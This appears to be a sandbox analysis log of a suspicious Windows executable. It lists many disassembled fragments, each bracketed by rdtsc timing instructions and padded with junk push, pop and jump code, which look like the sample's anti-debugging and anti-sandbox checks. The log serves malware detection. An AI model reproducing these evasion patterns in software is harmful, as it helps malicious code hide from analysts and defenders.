Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB564A second address: EB5676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FAAACBBF205h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB4377 second address: EB439C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FAAAD0E3C56h 0x00000011 jmp 00007FAAAD0E3C5Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB439C second address: EB43A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB43A0 second address: EB43A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB43A9 second address: EB43B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB43B6 second address: EB43C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAAD0E3C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB43C0 second address: EB43D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB51B7 second address: EB51FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FAAAD0E3C61h 0x0000000b jmp 00007FAAAD0E3C5Bh 0x00000010 jno 00007FAAAD0E3C5Eh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAAAD0E3C62h 0x0000001e je 00007FAAAD0E3C5Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB51FC second address: EB5207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAAACBBF1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB5207 second address: EB520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB520D second address: EB5217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB5370 second address: EB5376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB5376 second address: EB5394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF208h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB5394 second address: EB53AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 jo 00007FAAAD0E3C62h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBAF9D second address: EBAFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBAFA5 second address: EBAFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C67h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB9D5E second address: EB9D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBA330 second address: EBA34C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAAAD0E3C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FAAAD0E3C62h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBA4A6 second address: EBA4B7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAACBBF1FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBA7A6 second address: EBA7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAD0E3C5Eh 0x00000011 jng 00007FAAAD0E3C64h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBA8FC second address: EBA900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBA900 second address: EBA910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAAAD0E3C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBA910 second address: EBA916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBDD2E second address: EBDD63 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAD0E3C75h 0x00000008 ja 00007FAAAD0E3C56h 0x0000000e jmp 00007FAAAD0E3C69h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jbe 00007FAAAD0E3C56h 0x0000001d push edx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBDD63 second address: EBDD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EBDD69 second address: EBDD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C5Dh 0x0000000a pushad 0x0000000b js 00007FAAAD0E3C56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E44EA8 second address: E44EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E44EAE second address: E44EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E44EB2 second address: E44EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E80413 second address: E80423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E80423 second address: E8046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12A336AEh], ecx 0x00000011 lea eax, dword ptr [ebp+12BE3168h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FAAACBBF1F8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 or ecx, 679A3021h 0x00000037 nop 0x00000038 jne 00007FAAACBBF1FAh 0x0000003e push eax 0x0000003f push esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 pop esi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E8046E second address: E68012 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FAAAD0E3C58h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call dword ptr [ebp+12A334FEh] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E80EAC second address: E80EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E68BD3 second address: E68BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C67h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E68BEE second address: E68BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E68BF8 second address: E68BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E68BFC second address: E68C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FAAACBBF1F8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jnl 00007FAAACBBF223h 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAAACBBF203h 0x00000025 jmp 00007FAAACBBF1FAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC24DF second address: EC24F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FAAAD0E3C5Eh 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC24F6 second address: EC2524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF207h 0x00000007 pushad 0x00000008 jmp 00007FAAACBBF202h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC2524 second address: EC252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC2945 second address: EC294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC294E second address: EC2953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC2CEC second address: EC2CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC2CF1 second address: EC2D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FAAAD0E3C56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC2D09 second address: EC2D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC2E75 second address: EC2E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC7ADF second address: EC7B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAAACBBF207h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC839E second address: EC83AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FAAAD0E3C56h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC864A second address: EC864F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC87B3 second address: EC87B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC87B8 second address: EC87D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAACBBF202h 0x00000008 jbe 00007FAAACBBF1F6h 0x0000000e jnc 00007FAAACBBF1F6h 0x00000014 jo 00007FAAACBBF1FEh 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC8958 second address: EC8960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC8960 second address: EC8966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC8EA8 second address: EC8EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EC8EAE second address: EC8EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAACBBF1FFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ECD608 second address: ECD612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E3E395 second address: E3E399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E3E399 second address: E3E39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E3E39D second address: E3E3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E3E3A7 second address: E3E3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C63h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED01F0 second address: ED01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED01F6 second address: ED01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED01FE second address: ED0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED0209 second address: ED020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED020F second address: ED0213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED0213 second address: ED0237 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAD0E3C56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAD0E3C64h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED03BD second address: ED03C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED050D second address: ED0511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED0511 second address: ED0522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FAAACBBF1F8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED0522 second address: ED0527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EDA1F9 second address: EDA202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED8C64 second address: ED8C72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAAD0E3C58h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED9195 second address: ED919B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED919B second address: ED91A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED9450 second address: ED9454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED9454 second address: ED945A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED945A second address: ED947B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAAACBBF1F6h 0x00000009 jmp 00007FAAACBBF206h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: ED95A7 second address: ED95B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAAD0E3C5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EDC983 second address: EDC998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FAAACBBF210h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FAAACBBF1F6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EDC998 second address: EDC9A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAAAD0E3C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EDCC4C second address: EDCC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EDCC50 second address: EDCC8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAAAD0E3C69h 0x0000000e jp 00007FAAAD0E3C5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EE11F2 second address: EE11FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EE0AF3 second address: EE0AFD instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAAD0E3C6Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EE0AFD second address: EE0B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAACBBF1FEh 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0B12 second address: EE0B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0DDD second address: EE0DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0DEA second address: EE0DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE97B2 second address: EE97B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE97B6 second address: EE97BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE97BC second address: EE97C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE7D5E second address: EE7D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE8016 second address: EE801C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE8332 second address: EE8336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
